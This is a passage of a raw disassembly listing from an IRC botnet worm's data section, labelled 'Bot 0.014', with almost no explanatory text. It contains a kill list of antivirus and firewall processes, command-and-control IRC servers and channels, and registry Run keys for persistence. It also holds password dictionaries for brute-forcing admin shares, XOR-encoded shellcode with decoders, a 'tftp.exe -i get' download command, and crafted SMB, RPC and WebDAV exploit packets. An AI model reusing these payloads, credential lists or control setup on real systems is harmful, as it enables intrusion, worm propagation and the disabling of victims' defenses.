dd offset aTbscan_exe ; "TBSCAN.EXE"
dd offset aTc_exe ; "TC.EXE"
dd offset aTca_exe ; "TCA.EXE"
dd offset aTcm_exe ; "TCM.EXE"
dd offset aTds3_exe ; "TDS-3.EXE"
dd offset aTds298_exe ; "TDS2-98.EXE"
dd offset aTds2Nt_exe ; "TDS2-NT.EXE"
dd offset aTeekids_exe ; "TEEKIDS.EXE"
dd offset aTfak_exe ; "TFAK.EXE"
dd offset aTfak5_exe ; "TFAK5.EXE"
dd offset aTgbob_exe ; "TGBOB.EXE"
dd offset aTitanin_exe ; "TITANIN.EXE"
dd offset aTitaninxp_exe ; "TITANINXP.EXE"
dd offset aTracert_exe ; "TRACERT.EXE"
dd offset aTrickler_exe ; "TRICKLER.EXE"
dd offset aTrjscan_exe ; "TRJSCAN.EXE"
dd offset aTrjsetup_exe ; "TRJSETUP.EXE"
dd offset aTrojantrap3_ex ; "TROJANTRAP3.EXE"
dd offset aTsadbot_exe ; "TSADBOT.EXE"
dd offset aTvmd_exe ; "TVMD.EXE"
dd offset aTvtmd_exe ; "TVTMD.EXE"
dd offset aUndoboot_exe ; "UNDOBOOT.EXE"
dd offset aUpdat_exe ; "UPDAT.EXE"
dd offset aUpdate_exe ; "UPDATE.EXE"
dd offset aUpdate_exe ; "UPDATE.EXE"
dd offset aUpgrad_exe ; "UPGRAD.EXE"
dd offset aUtpost_exe ; "UTPOST.EXE"
dd offset aVbcmserv_exe ; "VBCMSERV.EXE"
dd offset aVbcons_exe ; "VBCONS.EXE"
dd offset aVbust_exe ; "VBUST.EXE"
dd offset aVbwin9x_exe ; "VBWIN9X.EXE"
dd offset aVbwinntw_exe ; "VBWINNTW.EXE"
dd offset aVcsetup_exe ; "VCSETUP.EXE"
dd offset aVet32_exe ; "VET32.EXE"
dd offset aVet95_exe ; "VET95.EXE"
dd offset aVettray_exe ; "VETTRAY.EXE"
dd offset aVfsetup_exe ; "VFSETUP.EXE"
dd offset aVirHelp_exe ; "VIR-HELP.EXE"
dd offset aVirusmdpersona ; "VIRUSMDPERSONALFIREWALL.EXE"
dd offset aVnlan300_exe ; "VNLAN300.EXE"
dd offset aVnpc3000_exe ; "VNPC3000.EXE"
dd offset aVpc32_exe ; "VPC32.EXE"
dd offset aVpc42_exe ; "VPC42.EXE"
dd offset aVpfw30s_exe ; "VPFW30S.EXE"
dd offset aVptray_exe ; "VPTRAY.EXE"
dd offset aVscan40_exe ; "VSCAN40.EXE"
dd offset aVscenu6_02d30_ ; "VSCENU6.02D30.EXE"
dd offset aVsched_exe ; "VSCHED.EXE"
dd offset aVsecomr_exe ; "VSECOMR.EXE"
dd offset aVshwin32_exe ; "VSHWIN32.EXE"
dd offset aVsisetup_exe ; "VSISETUP.EXE"
dd offset aVsmain_exe ; "VSMAIN.EXE"
dd offset aVsmon_exe ; "VSMON.EXE"
dd offset aVsstat_exe ; "VSSTAT.EXE"
dd offset aVswin9xe_exe ; "VSWIN9XE.EXE"
dd offset aVswinntse_exe ; "VSWINNTSE.EXE"
dd offset aVswinperse_exe ; "VSWINPERSE.EXE"
dd offset aW32dsm89_exe ; "W32DSM89.EXE"
dd offset aW9x_exe ; "W9X.EXE"
dd offset aWatchdog_exe ; "WATCHDOG.EXE"
dd offset aWebdav_exe ; "WEBDAV.EXE"
dd offset aWebscanx_exe ; "WEBSCANX.EXE"
dd offset aWebtrap_exe ; "WEBTRAP.EXE"
dd offset aWfindv32_exe ; "WFINDV32.EXE"
dd offset aWgfe95_exe ; "WGFE95.EXE"
dd offset aWhoswatchingme ; "WHOSWATCHINGME.EXE"
dd offset aWimmun32_exe ; "WIMMUN32.EXE"
dd offset aWinBugsfix_exe ; "WIN-BUGSFIX.EXE"
dd offset aWin32_exe ; "WIN32.EXE"
dd offset aWin32us_exe ; "WIN32US.EXE"
dd offset aWinactive_exe ; "WINACTIVE.EXE"
dd offset aWindow_exe ; "WINDOW.EXE"
dd offset aWindows_exe ; "WINDOWS.EXE"
dd offset aWininetd_exe ; "WININETD.EXE"
dd offset aWininit_exe ; "WININIT.EXE"
dd offset aWininitx_exe ; "WININITX.EXE"
dd offset aWinlogin_exe ; "WINLOGIN.EXE"
dd offset aWinmain_exe ; "WINMAIN.EXE"
dd offset aWinnet_exe ; "WINNET.EXE"
dd offset aWinppr32_exe ; "WINPPR32.EXE"
dd offset aWinrecon_exe ; "WINRECON.EXE"
dd offset aWinservn_exe ; "WINSERVN.EXE"
dd offset aWinssk32_exe ; "WINSSK32.EXE"
dd offset aWinstart_exe ; "WINSTART.EXE"
dd offset aWinstart001_ex ; "WINSTART001.EXE"
dd offset aWintsk32_exe ; "WINTSK32.EXE"
dd offset aWinupdate_exe ; "WINUPDATE.EXE"
dd offset aWkufind_exe ; "WKUFIND.EXE"
dd offset aWnad_exe ; "WNAD.EXE"
dd offset aWnt_exe ; "WNT.EXE"
dd offset aWradmin_exe ; "WRADMIN.EXE"
dd offset aWrctrl_exe ; "WRCTRL.EXE"
dd offset aWsbgate_exe ; "WSBGATE.EXE"
dd offset aWupdater_exe ; "WUPDATER.EXE"
dd offset aWupdt_exe ; "WUPDT.EXE"
dd offset aWyvernworksfir ; "WYVERNWORKSFIREWALL.EXE"
dd offset aXpf202en_exe ; "XPF202EN.EXE"
dd offset aZapro_exe ; "ZAPRO.EXE"
dd offset aZapsetup3001_e ; "ZAPSETUP3001.EXE"
dd offset aZatutor_exe ; "ZATUTOR.EXE"
dd offset aZonalm2601_exe ; "ZONALM2601.EXE"
dd offset aZonealarm_exe ; "ZONEALARM.EXE"
dd offset a_avp32_exe ; "_AVP32.EXE"
dd offset a_avpcc_exe ; "_AVPCC.EXE"
dd offset a_avpm_exe ; "_AVPM.EXE"
dd offset aHijackthis_exe ; "HIJACKTHIS.EXE"
dd offset aFAgobot_exe ; "F-AGOBOT.EXE"
dd offset aPandaavengine_ ; "PandaAVEngine.exe"
dd offset aSysinfo_exe ; "sysinfo.exe"
dd offset aMscvb32_exe ; "mscvb32.exe"
dd offset aPenis32_exe ; "Penis32.exe"
dd offset aBbeagle_exe ; "bbeagle.exe"
dd offset aSysmonxp_exe ; "SysMonXP.exe"
dd offset aWinupd_exe ; "winupd.exe"
dd offset aWinsys_exe ; "winsys.exe"
dd offset aSsate_exe ; "ssate.exe"
dd offset aRate_exe ; "rate.exe"
dd offset aD3dupdate_exe ; "d3dupdate.exe"
dd offset aIrun4_exe ; "irun4.exe"
dd offset aI11r54n4_exe ; "i11r54n4.exe"
dd offset aMsconfig_exe ; "MsConfiG.exe"
dd offset aWuanclt_exe ; "WUANCLT.EXE"
dd offset aWuacrlt_exe ; "WUACRLT.EXE"
dd offset aWruaclt_exe ; "WRUACLT.EXE"
dd offset aWinssv_exe ; "winssv.exe"
dd offset aScguard_exe ; "scguard.exe"
dd offset aWuamgrd_exe ; "wuamgrd.exe"
dd offset aBling_exe ; "bling.exe"
dd offset aWinmp_exe ; "winmp.exe"
dd offset aHass_exe ; "hass.exe"
dword_42BEB0 dd 1BBh ; DATA XREF: sub_40E6BB+40F�r
; sub_40E6BB+4C2�r
dword_42BEB4 dd 1BBh ; DATA XREF: sub_40E6BB+50E�r
dword_42BEB8 dd 4DBh ; DATA XREF: sub_4089DC:loc_40D6B9�r
dword_42BEBC dd 45h ; DATA XREF: sub_401141+3B�r
; sub_4089DC+41C2�r
dword_42BEC0 dd 4E20h ; DATA XREF: sub_401141:loc_40141D�r
; sub_4089DC:loc_40CC9E�r
dword_42BEC4 dd 201h ; DATA XREF: sub_4089DC:loc_40CE1F�r
dword_42BEC8 dd 1 ; DATA XREF: sub_4089DC+73E�r
dword_42BECC dd 1 ; DATA XREF: sub_4069F7+C�r
; sub_40E6BB:loc_40E9EE�r
byte_42BED0 db 2Eh ; DATA XREF: sub_4025B1:loc_4025BD�r
; sub_4089DC+7A4�r ...
align 4
dword_42BED4 dd 6 ; DATA XREF: sub_40F961+2B�r
; sub_40F961+51�r ...
dword_42BED8 dd 1 ; DATA XREF: sub_40887D+39�r
; sub_4089DC+25D�r ...
dword_42BEDC dd 1 ; DATA XREF: sub_40887D+30�r
; sub_4089DC+257�r
aBot014 db 'Bot014',0 ; DATA XREF: sub_4089DC+2F81�o
; sub_4089DC:loc_40D539�o ...
align 4
aBot0_014 db '[Bot 0.014]',0 ; DATA XREF: sub_4089DC:loc_40D8BE�o
aN3m3s1s db 'n3m3s1s',0 ; DATA XREF: sub_4089DC+4869�o
; sub_4089DC+5B28�o ...
a217_170_244_2 db '217.170.244.2',0 ; DATA XREF: sub_40E6BB+3FA�o
; sub_40E6BB+4B3�o
align 4
aHell db '#hell',0 ; DATA XREF: sub_40E6BB+416�o
; sub_40E6BB+4C9�o
align 4
aTroopers db 'troopers',0 ; DATA XREF: sub_40E6BB+42D�o
; sub_40E6BB+4DB�o
align 10h
byte_42BF20 db 70h ; DATA XREF: sub_40E6BB:loc_40EBAC�r
; sub_40E6BB+4FF�o
aAradise2005_ho db 'aradise2005.homeip.net',0
aHell_1 db '#hell',0 ; DATA XREF: sub_40E6BB+515�o
align 10h
aTroopers_0 db 'troopers',0 ; DATA XREF: sub_40E6BB+527�o
align 4
byte_42BF4C db 6Dh ; DATA XREF: sub_401141:loc_4011A4�o
; sub_401141+18E�o ...
db 73h, 6Dh, 6Eh
dd 33747261h, 78652E32h, 65h, 2E79656Bh, 747874h
aNetworkHostSer db 'Network Host Service',0 ; DATA XREF: sub_40213F+B�o
align 4
aSoul db '[SOUL]',0 ; DATA XREF: sub_40F961+12�o
align 4
aSysconfig_dat db 'sysconfig.dat',0
align 4
aIx db '+ix',0 ; DATA XREF: sub_4089DC+5CA7�o
aMurders db '#murders',0 ; DATA XREF: sub_4089DC+3F63�o
; sub_4089DC+59A2�o
align 4
aHell_2 db '#hell',0
align 4
aSniffing db '#sniffing',0
align 4
off_42BFB8 dd offset a@celestial_org ; DATA XREF: sub_4089DC+5BA6�r
; "*@celestial.org"
off_42BFBC dd offset aMircV6_12Khale ; DATA XREF: sub_4089DC+923�r
; "mIRC v6.12 Khaled Mardam-Bey"
aParadise2005_h db 'paradise2005.homeftp.net',0 ; DATA XREF: sub_4089DC+581E�o
align 4
dword_42BFDC dd 15h ; DATA XREF: sub_4089DC+5829�r
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: .data:off_42B3CC�o
align 10h
db 53h
aOftwareMicroso db 'oftware\Microsoft\Windows\CurrentVersion\RunServices',0
align 4
aSoftwareMicros db 'Software\Microsoft\OLE',0 ; DATA XREF: sub_40FE91+23�o
; sub_4101B8+23�o
align 10h
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\Lsa',0 ; DATA XREF: sub_40FE91+D5�o
; sub_4101B8+D5�o
align 4
off_42C088 dd offset aAdministrato_0 ; DATA XREF: .text:0041428B�r
; .text:00414293�o
; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aStaff ; "staff"
dd offset aRoot ; "root"
dd offset aComputer ; "computer"
dd offset aOwner ; "owner"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aWwwadmin ; "wwwadmin"
dd offset aGuest_0 ; "guest"
dd offset aDefault ; "default"
dd offset aDatabase ; "database"
dd offset aDba ; "dba"
dd offset aOracle ; "oracle"
dd offset aDb2 ; "db2"
align 8
dword_42C0D8 dd 420AEAh ; DATA XREF: .text:loc_413BFE�r
; .text:00413C0D�o ...
dd offset aAdministrato_0 ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aAdm ; "adm"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aPass1234 ; "pass1234"
dd offset aPass_0 ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2004 ; "2004"
dd offset aTest ; "test"
dd offset aGuest_0 ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem ; "system"
dd offset aServer ; "server"
dd offset aRoot ; "root"
dd offset aNull_0 ; "null"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aLogin ; "login"
dd offset aLoginpass ; "loginpass"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aExchange ; "exchange"
dd offset aFuck ; "fuck"
dd offset aBitch ; "bitch"
dd offset aSlut ; "slut"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aHell_0 ; "hell"
dd offset aHello ; "hello"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDatabase ; "database"
dd offset aAccess ; "access"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDatabasepass ; "databasepass"
dd offset aData ; "data"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDb1 ; "db1"
dd offset aDb2 ; "db2"
dd offset aDb1234 ; "db1234"
dd offset aSa ; "sa"
dd offset aSql ; "sql"
dd offset aSqlpassoainsta ; "sqlpassoainstall"
dd offset aOrainstall ; "orainstall"
dd offset aOracle ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aHp ; "hp"
dd offset aNokia ; "nokia"
dd offset aXp ; "xp"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aBlank ; "blank"
dd offset aWinpass ; "winpass"
dd offset aMain ; "main"
dd offset aLan ; "lan"
dd offset aInternet ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
align 8
dword_42C308 dd 10h ; DATA XREF: sub_401DEF+8C�w
; sub_4089DC+804�r ...
align 10h
dword_42C310 dd 736E6F63h ; DATA XREF: sub_40FC7C+11�r
dd 74h, 0
dword_42C31C dd 1 ; DATA XREF: sub_40FC7C:loc_40FCC5�r
off_42C320 dd offset sub_40F961 ; DATA XREF: sub_40FC7C+6C�r
aLetter db 'letter',0
align 10h
dd 2, 40F9BFh, 706D6F63h, 2 dup(0)
dd 3, 40FA0Ch, 6E756F63h, 797274h, 0
dd 4, 40FA7Bh, 736Fh, 2 dup(0)
dd 5, 40FAF0h
dword_42C374 dd 1D4C0h ; DATA XREF: sub_4104D1+10�r
off_42C378 dd offset aIpc ; DATA XREF: sub_40FE91:loc_410047�r
; sub_40FE91+1C4�r ...
; "IPC$"
dword_42C37C dd 0 ; DATA XREF: sub_4101B8:loc_41033A�r
dd offset aAdmin_0 ; "ADMIN$"
align 8
dd offset aC_3 ; "C$"
dd offset aC_2 ; "C:\\"
dd offset aD_3 ; "D$"
dd offset aD_2 ; "D:\\"
; ---------------------------------------------------------------------------
loc_42C398: ; DATA XREF: sub_410B55+C0�o
jmp short loc_42C39C
; ---------------------------------------------------------------------------
loc_42C39A: ; CODE XREF: .data:loc_42C39C�p
jmp short loc_42C3A1
; ---------------------------------------------------------------------------
loc_42C39C: ; CODE XREF: .data:loc_42C398�j
call loc_42C39A
loc_42C3A1: ; CODE XREF: .data:loc_42C39A�j
pop ebx
xor ecx, ecx
; ---------------------------------------------------------------------------
db 66h, 0B9h
word_42C3A6 dw 0FFFFh ; DATA XREF: sub_410B55:loc_410C08�w
db 80h, 73h, 0Eh
byte_42C3AB db 0FFh ; DATA XREF: sub_410B55+BA�w
dd 0F9E243h
; ---------------------------------------------------------------------------
loc_42C3B0: ; DATA XREF: sub_410B55+9C�o
jmp short loc_42C3B4
; ---------------------------------------------------------------------------
loc_42C3B2: ; CODE XREF: .data:loc_42C3B4�p
jmp short loc_42C3B9
; ---------------------------------------------------------------------------
loc_42C3B4: ; CODE XREF: .data:loc_42C3B0�j
call loc_42C3B2
loc_42C3B9: ; CODE XREF: .data:loc_42C3B2�j
pop ebx
xor ecx, ecx
; ---------------------------------------------------------------------------
db 0B1h
byte_42C3BD db 0FFh ; DATA XREF: sub_410B55+A1�w
dw 7380h
db 0Ch
byte_42C3C1 db 0FFh ; DATA XREF: sub_410B55+A7�w
dw 0E243h
dd 0F9h
dword_42C3C8 dd 364C033h, 0C783040h, 8B0C408Bh, 8BAD1C70h, 9EB0840h
; DATA XREF: sub_410A42+72�o
dd 8D34408Bh, 408B7C40h, 3D08B3Ch, 0CA8B3C40h, 8B784803h
dd 0DA8B2041h, 331C5903h, 57F633FFh, 3CA8B57h, 7981100Ch
dd 7373650Ah, 8B027541h, 3798133h, 72685474h, 3B8B0275h
dd 8304C083h, 0F68504C3h, 0FF85DB74h, 0F203D774h, 0E857FA03h
dword_42C42C dd 12h ; DATA XREF: sub_410A42+4A�w
aTftp_exeIGet db 'tftp.exe -i get ',0 ; DATA XREF: sub_410A42+96�o
aJ_0 db 'j',0
db 0E8h
dword_42C445 dd 17h ; DATA XREF: sub_410A42+5E�w
; ---------------------------------------------------------------------------
jnz short near ptr byte_42C44C
retn
; ---------------------------------------------------------------------------
byte_42C44C db 0E8h ; CODE XREF: .data:0042C449�j
dword_42C44D dd 1 ; DATA XREF: sub_410A42+55�w
byte_42C451 db 0, 6Ah, 0 ; DATA XREF: sub_410A42+EC�o
dd 7E8h
db 0, 0Fh, 84h
dword_42C45B dd 0FFFFFFEDh ; DATA XREF: sub_410A42+67�w
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
pop eax
pop ebx
pop ebp
push eax
sub esp, 54h
xor eax, eax
mov edi, esp
lea ecx, [eax+40h]
mov edx, edi
rep stosb
mov al, 44h
stosd
push edi
push edx
push ecx
push ecx
push 28h
push 1
push ecx
push ecx
push ebp
push ebx
call esi
add esp, 54h
test eax, eax
retn
; ---------------------------------------------------------------------------
align 10h
loc_42C490: ; DATA XREF: sub_4125E5:loc_4126FE�o
mov edi, ecx
xor al, al
inc al
repne scasb
jmp edi
; ---------------------------------------------------------------------------
align 10h
a?xmlVersion1_0 db '<?xml version="1.0"?>',0Dh,0Ah ; DATA XREF: sub_4125E5+18B�o
db '<g:searchrequest xmlns:g="DAV:">',0Dh,0Ah
db '<g:sql>',0Dh,0Ah
db 'Select "DAV:displayname" from scope()',0Dh,0Ah
db '</g:sql>',0Dh,0Ah
db '</g:searchrequest>',0Dh,0Ah,0
; ---------------------------------------------------------------------------
jmp short loc_42C53A
; =============== S U B R O U T I N E =======================================
sub_42C52A proc far ; CODE XREF: sub_42C52A:loc_42C53A�p
pop ebx
dec ebx
xor ecx, ecx
mov cx, 125h
loc_42C532: ; CODE XREF: sub_42C52A+C�j
xor byte ptr [ebx+ecx], 99h
loop loc_42C532
jmp short loc_42C53F
; ---------------------------------------------------------------------------
loc_42C53A: ; CODE XREF: .data:0042C528�j
call near ptr sub_42C52A
loc_42C53F: ; CODE XREF: sub_42C52A+E�j
jo short loc_42C5A3
cdq
cdq
cdq
mov ch, 38h
test eax, 12999999h
fst dword ptr [ebp+3485E912h]
adc dh, cl
xchg eax, ecx
adc ch, [esi-0Dh]
popf
sal byte ptr [ecx+2], 99h
cdq
cdq
jnp short loc_42C5C1
icebp
stosb
stosd
cdq
cdq
icebp
out dx, al
jmp far ptr 128Fh:66CDC6ABh
; ---------------------------------------------------------------------------
db 71h
dd 71C09DF3h, 9999991Bh, 7518607Bh, 99999809h, 9898F1CDh
dd 0CF669999h, 0C9C9C989h, 0D9C9D9C9h, 8DCF66C9h, 0E6F14112h
dd 0F1989999h, 4B9D999Bh
; ---------------------------------------------------------------------------
adc dl, [ebp-0Dh]
loc_42C5A3: ; CODE XREF: sub_42C52A:loc_42C53F�j
mov eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dd 0EC591C81h, 0F4FAF1D3h, 0FF1099FDh, 0CD751AA9h, 0F3BDA514h
dd 7B32C08Ch
db 64h
; ---------------------------------------------------------------------------
loc_42C5C1: ; CODE XREF: sub_42C52A+35�j
pop edi
fnstsw word ptr [ebp-22982277h]
mov ebp, 0BDC510A4h
rcl dword ptr [eax], 1
lds edi, [ebp-423AEF2Bh]
leave
adc al, 0DDh
mov ebp, 0C8C9CD89h
enter 0FFFFF3C8h, 98h
enter 66C8h, 0EFh
test eax, 9DCF66C8h
adc dl, [ebp-0Dh]
db 66h, 66h
test al, 66h
iret
sub_42C52A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xchg eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dw 6685h
dd 0CFC895CFh, 12A5DC12h, 9AE1B1CDh, 0EB12CB4Ch, 0AA6C9AB9h
dd 34D8D050h, 42AA5C9Ah, 0A3892796h, 5891ED4Fh, 439A9452h
dd 0A26872D9h, 0C37EEC86h, 9ABDC312h, 9512FF44h, 85C312D2h
dd 9D12449Ah, 325C9A12h, 715AC0C7h, 66666699h, 7597D717h
dd 8F2A67EBh, 579C4034h, 0F9795776h, 0A2657452h, 346C9040h
dd 0F9336075h, 0E05FE07Eh, 0
; ---------------------------------------------------------------------------
loc_42C668: ; DATA XREF: sub_412F21+112�o
; sub_412F21+1D9�o
jmp short loc_42C67A
; =============== S U B R O U T I N E =======================================
sub_42C66A proc near ; CODE XREF: sub_42C66A:loc_42C67A�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_42C672: ; CODE XREF: sub_42C66A+C�j
xor byte ptr [edx+ecx], 99h
loop loc_42C672
jmp short loc_42C67F
; ---------------------------------------------------------------------------
loc_42C67A: ; CODE XREF: .data:loc_42C668�j
call sub_42C66A
loc_42C67F: ; CODE XREF: sub_42C66A+E�j
jo short near ptr dword_42C5F8+1Eh
cwde
cdq
cdq
retn
sub_42C66A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
word_42C718 dw 4B9Dh ; DATA XREF: sub_412F21+E5�w
dw 59AAh
dd 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh, 66CAC9C9h
dd 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h, 10627B17h
dd 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h, 0AACFC989h
dd 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h, 0C8C9A5DEh
dd 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h, 591C3559h
dd 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h, 66677671h
dd 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh, 0F8FCEBDAh
dd 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h, 0F8FCEBF1h
dd 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h, 0AAC6ABEAh
dd 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h, 0F0F599FDh
dd 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh, 0FAF6EAFCh
dd 99EDFCF2h, 0
dword_42C800 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: .text:0041339F�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 2 dup(0)
dword_42C890 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:004133CB�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_42C940 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:004133F3�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_42CA20 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_412F21+53�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_4: ; DATA XREF: sub_412F21+90�o
unicode 0, <C$>,0
a????? db '?????',0
dd 2 dup(0)
dword_42CA88 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_412F21+28B�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 2 dup(0)
dword_42CAF8 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_412F21+2B2�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_42CBA0 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_412F21+383�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_42CC20 dd offset loc_401495 ; DATA XREF: sub_412F21+3A6�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
